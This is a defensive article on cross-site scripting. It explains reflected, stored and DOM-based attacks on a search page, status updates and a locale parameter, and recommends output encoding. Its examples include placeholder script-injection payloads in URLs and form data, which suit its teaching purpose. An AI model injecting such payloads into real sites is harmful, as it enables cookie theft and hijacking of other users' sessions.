To prevent XSS, you should encode characters that have special meaning in HTML, such as the
&character, angle brackets, single and double quotes, and the forward-slash character. In our example, you can encode the left and right angle brackets can be encoded into HTML characters < and > to prevent browsers from treating the content as script tags.
However, there are many ways attackers can use to smuggle executable Javascript code into a victim's browser. And a blocklist-based encoding scheme like this one might miss a few characters that will allow attackers to achieve XSS. So, it might be worth it to consider stricter approaches to input validation. For example, you can validate user input against a list of allowed values, or only allow a limited set of characters (such as only alphanumeric characters in usernames) in user input.
The prevention of DOM-based XSS requires a different approach. Since the malicious user input won’t pass through the server, sanitizing the data that enters and departs from the server won’t work. Instead, you should avoid rewriting the HTML document based on user input, and implement client-side input validation before user input is inserted into the DOM.
Defense in Depth
You can also take measures to mitigate the impact of XSS flaws if they do happen. First, set the
HttpOnly flag on sensitive cookies that your site uses. This prevents attackers from stealing cookies via XSS. You should also implement the
Content-Security-Policy HTTP response header. This header lets you restrict how resources such as JavaScript, CSS, or images load on your web pages. To prevent XSS, you can instruct the browser to execute only scripts from a list of sources.
Preventing XSS in your Programming Language
Now, let’s talk about how you can prevent XSS vulnerabilities in your programming language!
Java
If you are using Java Server Pages (JSP), you need to be aware that JSP templates do not escape dynamic content by default. Let’s say that you want to display a message this way:
<h1>${message}</h1>
You will need to use the
<c:out> tag or
fn:escapeXml() function to escape potentially dangerous content in untrusted input:
<h1><c:out</h1><h1>${fn:escapeXml(message)}</h1>
Python
Most Python template languages will take care of output encoding for you. For example, Jinja2 will automatically encode any input placed within curly braces. This should prevent XSS in most cases.
{{ user-input }}
Node.js
Most Javascript template languages escape dynamic content by default. For example, the Nunjucks template language will automatically escape anything between curly braces:
{{ "<script>alert(1)</script>" }}
This will output in HTML:
<script>alert(1)</script>
C#
The Razor template language that uses C# automatically escapes dynamic content automatically and protects against most potential XSS attacks:
string message = "<script>alert(1)</script>";
}<h1>@message</h1>
This code will render the HTML code:
<h1><script>alert(1)</script></h1>
Go
The Go package
html/template will automatically escape dynamic content, protecting you from most XSS:
import "html/template"t, err := template.New("foo").Parse(`{{define "T"}}{{.}}{{end}}`)err = t.ExecuteTemplate(out, "T", "<script>alert(1)</script>")
This code will write the escaped string <script>alert(1)</script> to the output variable
out.
On the other hand, the
"text/template" package does not offer this protection.
Scala
Most template languages in Scala will also encode dynamic content by default. For instance, in the Play framework, this user input will be displayed safely:
<p>
@(user-input)
</p>
Overriding Safe Defaults
For each template language that automatically encodes dynamic content, there are ways of overriding the safe default, which might render the application vulnerable. And if you are constructing HTML code manually from user input and not using templates to render dynamic content, then you’ll need to find a way to encode the user input before inserting it into HTML strings. See our vulnerability database (TODO: add vulnerability database link) for some example scenarios that might make an application vulnerable and for some tips for escaping content manually in different programming languages.
Opinions expressed by DZone contributors are their own. | https://dzone.com/articles/xss-prevention-cheatsheet | CC-MAIN-2022-21 | refinedweb | 1,376 | 50.57 |
Breaking QByteArray::toBase64() results into 64 character lines
- Phil Weinstein
It would be nice if QByteArray::toBase64() had an option to split the results into multiple fixed-length lines.
Currently its results are just in a single line (i.e. with no line breaks). (We actually have a requirement for this; my group's model serialization can't have arbitrarily long lines). The documentation states that this function conforms to RFC 2045 which seems to require lines of no more that 76 characters, but there may be a technical reason why this isn't always required. But still, it would be nice. (Apparently some other Base64 encodings require line lengths of 64 characters, so that's a good general length).
Could QByteArray::toBase64() be enhanced with an optional integer parameter of the maximum line length, with 0 as the default for the current single-line behavior?
Here is a function we are now using to do this line breaking:
@QByteArray UserImageData::wrapAt64Chars (const QByteArray& inArray)
{
// This function takes a QByteArray lacking line breaks and returns
// that QByteArray value with line breaks inserted after every
// 64 bytes. It is intended for use with Base64-encoded QByteArrays
// created with QByteArray::toBase64() which generates a Base64 string
// without line breaks [as of Qt 4.8.5].
//
// Note that the QByteArray::fromBase64() static method ignores all
// characters which are not part of the encoding, including CR and LF.
// This is a provision of the "RFC 2045" Base64 standard supported by
// these methods. RFC 2045 specficies a maximum line length of 76
// characters. See:
//
// The code below was adapted from this method in Qt 4.8:
// ByteArray QSslCertificatePrivate::QByteArray_from_X509();
const int inSize = inArray.size();
const int outEst = inSize + (inSize/32) + 4;
QByteArray outArray;
outArray.reserve (outEst);
const char* inPtr = inArray.data();
for (int inCrs = 0; inCrs <= inSize - 64; inCrs += 64)
{
outArray += QByteArray::fromRawData (inPtr + inCrs, 64);
outArray += "\n";
}
const int rem = inSize % 64;
if (rem > 0)
{
outArray += QByteArray::fromRawData (inPtr + inSize - rem, rem);
outArray += "\n";
}
return (outArray);
}@
- SGaist Lifetime Qt Champion
Hi,
For this kind of demand, you should create a new feature request "here": . Asking this on the forum will likely get lost in the long run because it's not closely followed by Qt's maintainers/developers, it's more user oriented.
Happy coding :) | https://forum.qt.io/topic/33596/breaking-qbytearray-tobase64-results-into-64-character-lines | CC-MAIN-2018-51 | refinedweb | 381 | 52.6 |
Location something wrong, or does this have something to do with the way IOS works?
btw, I'm doing it like this.
import location while True: location.start_updates() sleep(3) #Or some other number loc = location.get_location() location.stop_updates() print loc.get('timestamp')
Hello,
I am having the same problem, unable to update location within a loop. Did you figure out how to fix this?The following code shows the same location and time stamp for each iteration of the loop.
import location, time
def getLocation():
location.start_updates() time.sleep(5) # give GPS hardware 5 seconds to wake up currLoc = location.get_location() return currLoc
x = 0
while x < 10:
    print(getLocation())
    x = x + 1
- lenoirmind
Hello both. I found the same issue as well.
Both in a Scene based script and a script in the interpreter, I can't get the location module to update within a loop.
I am not sure if this could be an iOS "feature" that limits Pythonista's continuous sensing possibilities in a way. It would be great, though, if it were possible to sense the location within a loop.
Hello,
same here, please anybody, a solution would be highly appreciated, this is quite an annoying problem for me.
Thank you so much,
Hubertus
You are given two strings X and Y with lengths m and n. You need to find the length of the longest common substring.
Sample Input: X = “nerdycoderisaprogrammingsite”, Y = “Iamanerdycoder”
Expected Output: 10
Explanation: The longest common substring here is “nerdycoder” of length 10.
Algorithm:
- Let m and n be the length of the strings X and Y.
- This problem can be solved using dynamic programming since it has both optimal substructure and overlapping subproblems.
- We initialize a max_ variable which will store the length of the longest common substring.
- Create a 2D array dp of size (m+1, n+1) and initialize it with 0.
- dp[i][j] will store the length of the longest common substring that ends at X[i] and Y[j].
- For every value of i and j, we do the following.
If X[i] == Y[j], then dp[i][j] = dp[i-1][j-1] + 1. This is because, if the current characters of both strings are the same, the common substring ending at the previous characters is extended by 1. We then update the max_ variable accordingly.
Else, we set dp[i][j] = 0.
- The final answer is the maximum value seen over all dp[i][j], which we keep in max_.
/* Author => Raunak Jain */
#include <bits/stdc++.h>
using namespace std;

int helper(string X, string Y, int m, int n){
    if(m == 0 || n == 0){
        return 0;
    }
    int max_ = 0;  // 0, not INT_MIN, so strings with no common character return 0
    vector<vector<int>> dp(m + 1, vector<int>(n + 1, 0));
    for(int i = 1; i <= m; i++){
        for(int j = 1; j <= n; j++){
            if(X[i - 1] == Y[j - 1]){
                dp[i][j] = dp[i - 1][j - 1] + 1;
                max_ = max(max_, dp[i][j]);
            }else{
                dp[i][j] = 0;
            }
        }
    }
    return max_;
}

int main(){
    string X = "nerdycoderisaprogrammingsite";
    string Y = "Iamanerdycoder";
    int m = X.size();
    int n = Y.size();
    cout << helper(X, Y, m, n);
    return 0;
}
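The same DP, sketched in Python for readers who prefer it (it mirrors the C++ above line for line):

```python
def longest_common_substring(x, y):
    m, n = len(x), len(y)
    best = 0  # length of the longest common substring seen so far
    dp = [[0] * (n + 1) for _ in range(m + 1)]
    for i in range(1, m + 1):
        for j in range(1, n + 1):
            if x[i - 1] == y[j - 1]:
                dp[i][j] = dp[i - 1][j - 1] + 1
                best = max(best, dp[i][j])
            # else dp[i][j] stays 0: any common substring is broken here
    return best

print(longest_common_substring("nerdycoderisaprogrammingsite", "Iamanerdycoder"))  # 10
```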
Also take a look at another popular interview question Rod Cutting Problem.
I'm sorry but I don't understand what you mean by sample file. Do you just want a file full of code that next/previous isn't working in? Here's a simple Python file next/previous stopped working in. The Python Linter is the only one I really use but I can try the others if you would like.
# alternate implementation with lengths
def myzip(*seqs):
    minlen = min(len(s) for s in seqs)
    return [tuple(s[i] for s in seqs) for i in range(minlen)]
def mymapPad(*seqs, **pad):
    maxlen = max(len(s) for s in seqs)
    index = range(maxlen)
    return [tuple((s[i] if len(s) > i else pad) for s in seqs) for i in index]
s1, s2 = 'abc', 'xyz123'
print myzip(s1, s2)
print mymapPad(s1, s2)
print mymapPad(s1, s2, pad=99)
I get errors on lines 3-5 and 7-10, and next/previous error is working perfectly for me. Please remove all plugins but SublimeLinter from the Packages directory, restart ST2 and see if it works. If it does, some other plugin must be eating those key combinations.
Tic Tac Toe might be a futile children's game but it can also teach us about artificial intelligence. Tic Tac Toe, or Noughts and Crosses, is a zero-sum game with perfect information. Both players know exactly what the other did, and when nobody makes a mistake, the game will always end in a draw.
Tic Tac Toe is a simple game, but even the much more complex game of chess is a zero-sum game with perfect information.
In this two-part post, I will build an unbeatable Tic Tac Toe Simulation. This first part deals with the mechanics of the game. The second post will present an algorithm for a perfect game.
Drawing the Board
This first code snippet draws the Tic Tac Toe simulation board. The variable xo holds the identity of the pieces and the vector board holds the current game. Player X is denoted with -1 and player O with +1. The first part of the function draws the board and the noughts and crosses. The second part of the code checks for three in a row and draws the corresponding line.
draw.board <- function(board) { # Draw the board
  xo <- c("X", " ", "O") # Symbols
  par(mar = rep(0, 4))
  plot.new()
  plot.window(xlim = c(0, 30), ylim = c(0, 30))
  abline(h = c(10, 20), col = "darkgrey", lwd = 4)
  abline(v = c(10, 20), col = "darkgrey", lwd = 4)
  pieces <- xo[board + 2]
  text(rep(c(5, 15, 25), 3), c(rep(25, 3), rep(15, 3), rep(5, 3)), pieces, cex = 6)
  # Identify location of any three in a row
  square <- t(matrix(board, nrow = 3))
  hor <- abs(rowSums(square))
  if (any(hor == 3)) hor <- (4 - which(hor == 3)) * 10 - 5 else hor <- 0
  ver <- abs(colSums(square))
  if (any(ver == 3)) ver <- which(ver == 3) * 10 - 5 else ver <- 0
  diag1 <- sum(diag(square))
  diag2 <- sum(diag(t(apply(square, 2, rev))))
  # Draw winning lines
  if (hor > 0) lines(c(0, 30), rep(hor, 2), lwd = 10, col = "red")
  if (ver > 0) lines(rep(ver, 2), c(0, 30), lwd = 10, col = "red")
  if (abs(diag1) == 3) lines(c(2, 28), c(28, 2), lwd = 10, col = "red")
  if (abs(diag2) == 3) lines(c(2, 28), c(2, 28), lwd = 10, col = "red")
}
Random Tic Tac Toe
The second part of the code generates ten random games and creates an animated GIF file. The code adds random moves until one of the players wins (winner <> 0) or the board is full (no zeroes in the game vector). The eval.winner function checks for three in a row and declares a winner when found.
There are 255,168 possible legal games in Tic Tac Toe, 46,080 of which end in a draw. This implies that these randomised games result in a draw 18% of the time.
eval.winner <- function(board) { # Identify winner
  square <- t(matrix(board, nrow = 3))
  hor <- rowSums(square)
  ver <- colSums(square)
  diag1 <- sum(diag(square))
  diag2 <- sum(diag(t(apply(square, 2, rev))))
  if (3 %in% c(hor, ver, diag1, diag2)) return(1)
  else if (-3 %in% c(hor, ver, diag1, diag2)) return(2)
  else return(0)
}

# Random game
library(animation)
saveGIF({
  for (i in 1:10) {
    game <- rep(0, 9) # Empty board
    winner <- 0       # Define winner
    player <- -1      # First player
    draw.board(game)
    while (0 %in% game & winner == 0) { # Keep playing until win or full board
      empty <- which(game == 0)               # Define empty squares
      move <- empty[sample(length(empty), 1)] # Random move
      game[move] <- player                    # Change board
      draw.board(game)
      winner <- eval.winner(game)             # Evaluate game
      player <- player * -1                   # Change player
    }
    draw.board(game)
  }
}, interval = 0.25, movie.name = "ttt.gif", ani.width = 600, ani.height = 600)
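For readers following along in another language, here is a minimal Python sketch of the same sums-based winner check (using the same encoding as above: X = -1, O = +1, board stored row by row):

```python
def eval_winner(board):
    """board: list of 9 ints (-1 = X, +1 = O, 0 = empty), row-major."""
    rows = [board[i:i + 3] for i in range(0, 9, 3)]
    lines = rows + [list(col) for col in zip(*rows)]
    lines.append([rows[i][i] for i in range(3)])      # main diagonal
    lines.append([rows[i][2 - i] for i in range(3)])  # anti-diagonal
    for line in lines:
        if sum(line) == 3:
            return 1   # three +1s: player O wins
        if sum(line) == -3:
            return 2   # three -1s: player X wins
    return 0           # no winner (yet)
```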
Tic Tac Toe Simulation
In a future post, I will outline how to program the computer to play against itself, just like in the 1983 movie War Games.
On Sunday, 4 September 2011 13:10:56, Jordi Negrevernis i Font wrote:
> Matthias Pfafferodt wrote:
> > The check is implemented like this since 2004 ... Considering patch #2943
> > (), the index values should be compared:
> >
> > bool same_pos(const struct tile *tile1, const struct tile *tile2)
> > {
> >   fc_assert_ret_val(tile1 != NULL && tile2 != NULL, FALSE);
> >   return (tile1->index == tile2->index);
> > }
This code would be a patch - it changes the comparison of pointers to a comparison of the index value.

> But this is not the code on S2_3 and trunk!! It's that:
>
> bool same_pos(const struct tile *tile1, const struct tile *tile2)
> {
>   fc_assert_ret_val(tile1 != NULL && tile2 != NULL, FALSE);
>   return (tile1 == tile2);
> }
>
> This is comparing only the pointers!!! Is this correct?

It is correct as long as no virtual tile is used. In this case there is only _one_ map with pointers to each tile. So to check if two positions (tiles) are identical, the pointers must be compared. With virtual tiles, one of the tiles could be such a special tile and the check would fail even if it is the same position. Thus, something else, like the index, is needed.

The code above should be applied on top of the patch mentioned in my first mail. Else, the index value for the virtual tile is not set.

> > On Sunday, 4 September 2011 02:48:24, Jordi Negrevernis i Font wrote:
> >> I was trying to debug some issues with the AI, and I realized that
> >> some checks I put in the code didn't succeed because the 'same_pos'
> >> function does not check the value of x and y in the structure, instead
> >> it just compares the points!!!????!!!
> >>
> >> How is that supposed to work??!! Which is the way to check two
> >> locations?
> >>
> >> Thanks

_______________________________________________
Freeciv-dev mailing list
Freeciv-dev@gna.org
On Tue, 11 Jan 2000, David Grothe wrote:
> Alexander Viro wrote:
> > _All_ ->u is off-limits for any device code. It
> > belongs to hosting filesystem and to nobody else.
>
> If a driver needs to have a private structure that associates with each "real"
> file (inode instance) then what is the recommended technique? Private hash
> table on major/minor? What is the officially recommended technique here.
>
> I obviously misunderstood that the generic_ip was like a private structure
> pointer in a number of other kernel control structures, such as net_device.

Hold on. Inode is not a good thing here - if (_big_ if) you need per-file
data - refer to it from struct file (that is, if you really need it on
per-opener basis; _very_ rare situation). If you need it on per-device -
keep it in the driver. Inode gives either too coarse or too fine
granularity here - there may be a lot of independent openers of inode and
there may be many inodes pointing to your device. In effect, device inode
acts as a sort of symlink - just that it points into other namespace.

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at
On 12/3/06, Graham Percival <address@hidden> wrote:
Han-Wen Nienhuys wrote:
> Graham Percival escreveu:
>> Han-Wen Nienhuys wrote:
>>> As I've said before: it's almost trivially easy to make the frontend
>>> x86 too, but someone needs to run py2app on an intel box, and
>>> send me the results.
>> I installed fink's py2app-py24 but that gave me a "py2applet" file. When
>> I run that, I get usage info. What should I do? (I'm not familiar with
>> python)
> something like
>
> python setup.py py2app

Err... like this?

w163-mac:~/tmp gperciva$ py2applet --make-setup
Wrote setup.py
w163-mac:~/tmp gperciva$ python setup.py
Traceback (most recent call last):
  File "setup.py", line 8, in ?
    from setuptools import setup
ImportError: No module named setuptools
Unfortunately you're not. Python's complaining that the setuptools module isn't available and so the import fails. You can try using find (matching on the name setuptools) to see if you have the module on your system at all. If you do have setuptools on your filesystem, change the value of PYTHONPATH (which you can, of course, echo on the commandline to inspect) to include whatever directory setuptools lives in. If you don't have setuptools on your system then you'll have to go fetch it from somewhere. You can also type

prompt> python
import setuptools
to test python and see if it can find the setuptools module once you've done the installation. -- Trevor Bača address@hidden
Setup
Install Scala 2.11 and sbt:
$ brew install scala sbt
Incidentally, I have been using emr-5.0.0. The Hadoop and Spark versions are 2.7 and 2.0. If you intend to run on EMR, it is important that your jar is compiled with the same version of Scala used to compile Spark, and this applies both to the local Spark library and to the Spark installed on the EMR cluster.
Download Spark 2.0. If an uncompiled version was downloaded, compile it with:
$ ./build/mvn -DskipTests clean package
The bin directory contains two useful scripts: bin/spark-shell and bin/spark-submit. You might want to put these in your search path. Symlinks aren't good enough. Here are the two scripts that I put in my search path:
#!/bin/bash
cd /Users/clark/Local/src/spark-2.0.0
exec ./bin/spark-shell "$@"
and
#!/bin/bash
cd /Users/clark/Local/src/spark-2.0.0
exec ./bin/spark-submit "$@"
Resilient Distributed Datasets (RDDs)
Read a file on the local file system into an RDD:
import org.apache.spark.SparkContext

val sc = new SparkContext()
val lines = sc.textFile("/PATH/TO/file.txt")
lines is of type org.apache.spark.rdd.RDD[String]. Each line in the source file becomes a String in the RDD.
An RDD provides first and take methods for getting the first and the first N records.
Here is an example of using Spark to process an /etc/passwd file:
val lines = sc.textFile("/etc/passwd")
val validLines = lines.filter((line) => !line.startsWith("#"))
val data = validLines.map((line) => line.split(':'))
data.map((row) => row.mkString("\t")).saveAsTextFile("/tmp/passwd.d")
After reading in the file, the comments are removed. Then the data is transformed to a dataset of type RDD[Array[String]].
Finally the data is converted back to RDD[String] so it can be saved to the directory /tmp/passwd.d. In the output file, the fields are tab delimited instead of colon delimited.
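As a sanity check, the same filter → map → save pipeline can be mimicked in plain Python on a small in-memory sample (this is not Spark, just the same dataflow):

```python
# stand-in for sc.textFile("/etc/passwd")
lines = [
    "# comment line",
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
]
valid_lines = [line for line in lines if not line.startswith("#")]  # filter
data = [line.split(":") for line in valid_lines]                    # map
output = ["\t".join(row) for row in data]                           # saveAsTextFile stand-in
```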
An Array can be converted to an RDD:
val rdd = sc.parallelize(Array("foo\tbar", "baz\tquux", "wombat\twumpus"))
Using cache()
How to read or write a CSV
Datasets
Data Frames
In Spark 2.0, a DataFrame is a Dataset of Row.
Load the data into a Spark grid:
$ spark-shell

scala> val df = spark.read.json("/Users/clark/samplehose.en.2016-04-14-03.json.gz")
Display the JSON Schema:
scala> df.printSchema()
root
 |-- _augmentations: array (nullable = true)
 |    |-- element: string (containsNull = true)
 |-- actor: struct (nullable = true)
 |    |-- activityCount: long (nullable = true)
 |    |-- description: string (nullable = true)
 |    |-- displayName: string (nullable = true)
 |    |-- followerCount: long (nullable = true)
 |    |-- followingCount: long (nullable = true)
 |    |-- id: string (nullable = true)
 |    |-- image: struct (nullable = true)
 |    |    |-- height: long (nullable = true)
 |    |    |-- objectType: string (nullable = true)
...
How many records have positive sentiment:
scala> df.filter(df("meta.sentiment") > 0).count()
res9: Long = 114
Distribution of sentiment values:
scala> df.groupBy("meta.sentiment").count().show()

sentiment  count
        0    301
       -1     33
     null      5
       -2     15
        1     28
       -3     30
        2      6
       -4    157
        3      4
       -5     13
        4      3
        5      7
       -6     38
        6     53
       -7      4
        7      7
       -9     22
        8      2
      -10      3
       10      3
create DataFrame from Dataset (or RDD?) createOrReplaceTempView
Map/Reduce Equivalents
I've been disappointed at times with the underlying implementation of some of the RDD methods. For example, the takeSample method seems to try to send the entire RDD to a single process, causing a failure if the RDD is large.
If you know how to implement a job as a Map/Reduce job in an efficient way, it can be replicated in Spark using map() and reduceByKey(), with some provisos. The map() lambda should return (key, value) pairs.
If you need a mapper which does not return exactly one output pair per input, use flatMap() instead of map().
If the reducer needs to change the key value in the output, use groupByKey() instead of reduceByKey().
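To make the provisos concrete, here is the classic word count expressed as the flatMap/reduceByKey dataflow in plain Python (the helper names are mine, not Spark's API):

```python
from itertools import chain

def flat_map(f, records):
    # the mapper may emit zero or more (key, value) pairs per input record
    return chain.from_iterable(f(r) for r in records)

def reduce_by_key(f, pairs):
    # combine all values that share a key, like Spark's reduceByKey
    acc = {}
    for k, v in pairs:
        acc[k] = f(acc[k], v) if k in acc else v
    return acc

lines = ["to be or not to be", "be here now"]
pairs = flat_map(lambda line: [(w, 1) for w in line.split()], lines)
counts = reduce_by_key(lambda a, b: a + b, pairs)
```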
Similar to variables, all code written in a program is also stored in memory during program execution. Therefore every piece of executable code has a distinct address by which it can be referred to. C has the flexibility to obtain the starting address of a function through a pointer - known as a function pointer.
Consider the following function
int multiply(short a, short b)
{
    return (int)a * (int)b;
}
To store the address of this function in a function pointer, the following syntax is used:
int (*pf)(short, short) = multiply;
^    ^    ^               ^
|    |    |               function name
|    |    function parameter types inside parentheses
|    variable name followed by *, everything enclosed inside parentheses
function return type
Once declared, the variable name (pf here) can be used as a function:

int product = pf(3, 4); /* calls multiply(3, 4); product is 12 */
What's the point of having a function pointer when we can call the function directly? Sometimes there are multiple similar functions (with the same prototype) to choose from, and the decision must be made at runtime. Here is a complete example.
Sorting Student Database
Suppose we want to create a database of students. For simplicity, each student will have a unique id, name and passing year.
#define MAX_NAME_SIZE 1000

typedef struct
{
    uint32_t id;
    char name[MAX_NAME_SIZE];
    uint32_t passing_year;
} Student;
We declare a database (simply an array will work for us) of students and initialize everything to 0 (good practice to avoid undefined behaviour).
#define MAX_STD_SIZE 30

Student std_db[MAX_STD_SIZE];
memset(std_db, 0, sizeof(std_db));
We populate this array somehow (in this example, students will be randomly generated). Now we have a collection of students. Looking through them one by one for specific information may not be efficient. For example, we may want a list of students sorted by passing year, or a list of students sorted by name for easy lookup.
In this example we're going to sort the student array using the qsort function available in the stdlib.h library. But simply calling qsort with the array isn't enough, because qsort has no idea how to sort two Students. Instead, qsort takes a function pointer as a parameter to compare two Student objects with one another and determine their position with respect to each other.
This kind of comparison function is also known as a comparator. For qsort, it has the following prototype:
int (*compar)(const void *, const void *)
This function takes pointers to the two objects to be compared. The requirements for this comparator are as follows:
- If the objects are equal, it will return 0.
- If the first object should be placed before the second object in the sorted array, it will return a negative integer.
- If the first object should be placed after the second object in the sorted array, it will return a positive integer.
We'll define two comparators in this example to pass to qsort so that the student array can be sorted as we wish.
Sort by passing year
Sorting by passing year is easy. The objects pointed to by the void pointers are cast to Student objects. Subtracting the second passing year from the first then satisfies the comparator contract.
int sort_by_passing_year(const void* a, const void* b)
{
    const Student *sa = a;
    const Student *sb = b;
    return sa->passing_year - sb->passing_year;
}
Sort by name
The name with fewer characters can be considered to come first. If the lengths of the names are the same, then a character-by-character comparison needs to be performed to determine which name comes first.
int sort_by_name(const void* a, const void* b)
{
    const Student *sa = a;
    const Student *sb = b;
    int lena = strlen(sa->name);
    int lenb = strlen(sb->name);
    if (lena == lenb)
    {
        /* Names having same length */
        for (int i = 0; i < lena; i++)
        {
            if (sa->name[i] != sb->name[i])
            {
                return sa->name[i] - sb->name[i];
            }
        }
        /* Names are same */
        return 0;
    }
    /* Consider the name with less characters to be the lesser of two objects */
    return lena - lenb;
}
With the comparator functions defined, the array of student objects can be sorted by name:
qsort(std_db, MAX_STD_SIZE, sizeof(std_db[0]), sort_by_name);
or passing year:
qsort(std_db, MAX_STD_SIZE, sizeof(std_db[0]), sort_by_passing_year);
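If it helps to see the same contract in another language: Python's functools.cmp_to_key accepts exactly this kind of comparator (negative / zero / positive). The records and names below are made up for illustration:

```python
from functools import cmp_to_key

students = [
    {"id": 1, "name": "alice", "passing_year": 2019},
    {"id": 2, "name": "bo", "passing_year": 2017},
    {"id": 3, "name": "carolina", "passing_year": 2018},
]

def sort_by_passing_year(a, b):
    # same contract as the C comparator: <0, 0, or >0
    return a["passing_year"] - b["passing_year"]

def sort_by_name(a, b):
    la, lb = len(a["name"]), len(b["name"])
    if la == lb:
        # character-by-character comparison, as in the C version
        return (a["name"] > b["name"]) - (a["name"] < b["name"])
    return la - lb  # shorter name sorts first

by_year = sorted(students, key=cmp_to_key(sort_by_passing_year))
by_name = sorted(students, key=cmp_to_key(sort_by_name))
```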
Full example together:
by Yan Cui
How to auto-create CloudWatch Alarms for APIs with CloudWatch Events and Lambda
In a previous post, I discussed how to auto-subscribe a CloudWatch Log Group to a Lambda function using CloudWatch Events. The benefit of this is that we don’t need a manual process to ensure all Lambda logs are forwarded to our log aggregation service.
Whilst this is useful in its own right, it only scratches the surface of what we can do. CloudTrail and CloudWatch Events make it easy to automate many day-to-day operational steps, with the help of Lambda, of course.
I work with API Gateway and Lambda a lot. Whenever you create a new API, or make changes, there are several things you need to do:
- Enable Detailed Metrics for the deployment stage
- Set up a dashboard in CloudWatch, showing request count, latencies, and error counts
- Set up CloudWatch Alarms for P99 latencies and error counts
Because these are manual steps, they often get missed.
Have you ever forgotten to update the dashboard after adding a new endpoint to your API? And did you also remember to set up a P99 latency alarm on this new endpoint? How about alarms on the number of 4xx or 5xx errors?
Most teams I’ve dealt with have some conventions around these, but they don’t have a way to enforce them. The result is that the convention is applied in patches and cannot be relied upon. I find that this approach doesn’t scale with the size of the team.
It works when you’re a small team. Everyone has a shared understanding, and the necessary discipline to follow the convention. When the team gets bigger, you need automation to help enforce these conventions.
Fortunately, we can automate away these manual steps using the same pattern. In the Monitoring unit of my course Production-Ready Serverless, I demonstrated how you can do this in 3 simple steps:
- CloudTrail captures the CreateDeployment request to API Gateway
- CloudWatch Events pattern against this captured request
- Lambda function to enable detailed metrics, and create alarms for each endpoint
If you use the Serverless framework, then you might have a function that looks like this:
A couple of things to note from the code above:
- I’m using the serverless-iam-roles-per-function plugin to give the function a tailored IAM role
- The function needs the apigateway:PATCH permission to enable detailed metrics
- The function needs the apigateway:GET permission to get the API name and REST endpoints
- The function needs the cloudwatch:PutMetricAlarm permission to create the alarms
- The environment variables specify SNS topics for the CloudWatch Alarms
The captured event looks like this:
We can find the restApiId and stageName inside the detail.requestParameters attribute. That’s all we need to figure out what endpoints are there, and so what alarms we need to create.
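A minimal sketch of pulling those two fields out of the event in Python; the event below is trimmed to the relevant part and the values are illustrative, not a verbatim capture:

```python
event = {
    "detail": {
        "eventSource": "apigateway.amazonaws.com",
        "eventName": "CreateDeployment",
        "requestParameters": {"restApiId": "abcd1234", "stageName": "dev"},
    }
}

def extract_api_details(event):
    # everything we need lives under detail.requestParameters
    params = event["detail"]["requestParameters"]
    return params["restApiId"], params["stageName"]
```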
Inside the handler function, which you can find here, we perform a few steps:
- Enable detailed metrics with an updateStage call to API Gateway
- Get the list of REST endpoints with a getResources call to API Gateway
- Get the REST API name with a getRestApi call to API Gateway
- For each of the REST endpoints, create a P99 latency alarm in the AWS/ApiGateway namespace
Now, every time I create a new API, I will have CloudWatch Alarms to alert me when the 99 percentile latency for an endpoint goes over 1 second, for 5 minutes in a row.
All this, with just a few lines of code.
You can take this further, and have other Lambda functions to:
- Create CloudWatch Alarms for 5xx errors for each endpoint
- Create CloudWatch Dashboard for the API
So there you have it! A useful pattern for automating away manual operational tasks.
And before you tell me about the ACloudGuru AWS Alerts Serverless plugin by the ACloudGuru folks, yes I’m aware of it. It looks neat, but it’s ultimately still something the developer has to remember to do.
That requires discipline.
My experience tells me that you cannot rely on discipline, ever. Which is why I prefer to have a platform in place that will generate these alarms instead.
07 October 2010 14:06 [Source: ICIS news]
LONDON (ICIS)--French Union CGT said on Thursday that it was possible further strike action would spread from the Fos-Lavera oil terminal in southern France to the four refineries in the region, as workers at INEOS's Lavera site ended their eight-hour strike.
Workers at INEOS's refinery, which is one of the refineries in the region that in total account for one-third of …
Workers at the other three refineries in the Fos-Lavera area - Total's 158,000 La Mede refinery, ExxonMobil’s Fos-sur-Mer plant and LyondellBasell’s Berre L'Etang refinery - had not joined the protest at INEOS, which eased fears there would be an immediate shutdown of the region's oil processing capacity, CGT added.
More than 40 oil, gas, chemical and product tankers are at anchorage at the port awaiting the resumption of normal activities. However, talks between Fos-Lavera strikers and the management of the Mediterranean port remained in deadlock.
The port has now entered its 11th day of protests and supplies of crude oil to the four refineries have been interrupted, the French oil industry association, UFIP, said.
To worsen matters, unions have been organising strikes and mass demonstrations across.
2007 Canadian Computing Competition, Stage 2
Day 2, Problem 2: Particle Catcher
You may have heard that you cannot observe both the speed and location of a subatomic particle, simultaneously. At least, not until today, since computer scientists can ignore physicists whenever we want.
Your task is to determine both the speed and location of a particle that is moving around a nucleus. Of course, we will assume that the particle is moving in a circular orbit and moving at a constant velocity.
You can use your high-tech measuring device (which is, in fact, the synthesis of a spoon and a Commodore-64) to perform the following 3 different queries:
GetSize() - this method returns the integer representing the number of different positions in one orbit of the particle. You may assume that if this function returns N, the positions are labelled 0, ..., N-1. You may assume 2 ≤ N ≤ 100,000.
Look(a, b) - returns true if the point is in the range from a..b (where 0 ≤ a ≤ b ≤ N-1) at this moment and false otherwise. This method will be called repeatedly, but subsequent calls cause the particle to move v positions from its current position. In other words, the particle is moving at v units per query. The first call to this method will query the initial position of the point (i.e., the GetSize() method does not advance the point).
Guess(v, p) - will record the final velocity v and final position p (where 0 ≤ v, p ≤ N-1). There is exactly one call to this method, which will terminate the high-tech measuring device (i.e., no other calls may be made) and the high-tech device will output a statement indicating the success or failure of the guess (whether the point is at position p and velocity v when the call to Guess is made). Note that the particle is v units away from where it was at the last query statement.
You have a limit of 100 Looks, so be wise about your queries.
Interacting with the Judge
The methods mentioned above can be accessed through regular input/output.
1. The first line of input to your program will be N. (GetSize())
2. After that, you'll have to Look. To Look(a, b), just output a and b separated by a space on one line.
3. To get the result of your look, read an integer. You will receive 1 (true) or 0 (false) accordingly.
4. Repeat steps 2-3 as desired.
5. To make your final Guess, output "G v p" on one line where v and p are your guesses for the velocity/position.
You'll also need to fflush(NULL) [C++] or flush(output) [Pascal] whenever you output something.
Sample Code
#include <cstdio>
#include <iostream>
using namespace std;

int main() {
    int N;
    scanf("%d", &N);

    // look around
    printf("%d %d\n", 0, N - 1);
    fflush(NULL);
    int result;
    scanf("%d", &result); // result of the look

    int v = 1, p = 2;
    printf("G %d %d\n", v, p); // final guess
    fflush(NULL);
    return 0;
}
